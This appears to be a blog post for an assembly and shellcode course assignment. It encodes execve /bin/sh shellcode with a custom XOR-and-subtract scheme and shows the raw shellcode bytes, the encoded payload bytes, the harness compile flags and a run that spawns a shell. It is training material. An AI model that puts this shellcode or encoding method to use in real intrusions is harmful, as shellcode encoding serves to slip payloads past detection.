- Create a custom encoding scheme like the "insertion Encoder" we showed you
- PoC with using execve-stack as the shellcode to encode with your schema and execute.
We start with writing python encoder (included shellcode is execution of bin/sh
http://shell-storm.org/shellcode/files/shellcode-811.php
char shellcode[] = "\x31\xc0\x50\x68\x2f\x2f\x73"
"\x68\x68\x2f\x62\x69\x6e\x89"
"\xe3\x89\xc1\x89\xc2\xb0\x0b"
"\xcd\x80\x31\xc0\x40\xcd\x80"
Content of encoder.py
Running this produces the encoded (XOR with ff and minus 1) shellcode:
nelis@slae:~/SLAE/assignment4$ ./encoder.py
\xcd\x3e\xae\x96\xcf\xcf\x8b\x96\x96\xcf\x9c\x95\x90\x75\x1b\x75\x3d\x75\x3c\x4e\xf3\x31\x7e\xcd\x3e\xbe\x31\x7e
0xcd,0x3e,0xae,0x96,0xcf,0xcf,0x8b,0x96,0x96,0xcf,0x9c,0x95,0x90,0x75,0x1b,0x75,0x3d,0x75,0x3c,0x4e,0xf3,0x31,0x7e,0xcd,0x3e,0xbe,0x31,0x7e,
Shellcode lenght: 28
We now have the encoded shellcode that we need in our assembly decoder:
Construction of decoder.nasm
Compile decoder using .compile.sh
nelis@slae:~/SLAE/assignment4$ gcc -fno-stack-protector -z execstack shellcode.c -o shellcodenelis@slae:~/SLAE/assignment4$ ./shellcode
Payload shellcode Lenght: 51
$ id
uid=1000(nelis) gid=1000(nelis) groups=1000(nelis),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),107(lpadmin),124(sambashare)
No comments:
Post a Comment